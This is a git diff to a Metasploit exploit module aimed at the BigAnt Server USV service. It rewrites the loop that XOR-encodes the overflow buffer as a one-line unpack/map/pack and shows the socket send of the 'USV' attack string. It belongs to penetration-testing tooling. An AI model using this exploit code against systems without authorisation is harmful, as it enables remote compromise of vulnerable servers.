diff --git a/modules/exploits/windows/misc/bigant_server_usv.rb b/modules/exploits/windows/misc/bigant_server_usv.rb index f92858e8b1..b149ea1117 100644 --- a/modules/exploits/windows/misc/bigant_server_usv.rb +++ b/modules/exploits/windows/misc/bigant_server_usv.rb @@ -76,9 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit << [0xdeadbeef].pack('V') * 3 # the buffer gets xor'd with 0x2a ! - 0.upto(sploit.length-1) do |idx| - sploit[idx] = sploit[idx] ^ 0x2a - end + sploit = sploit.unpack("C*").map{|c| c ^ 0x2a}.pack("C*") print_status("Trying target #{target.name}...") sock.put("USV " + sploit + "\r\n\r\n") @@ -88,3 +86,4 @@ class Metasploit3 < Msf::Exploit::Remote end end +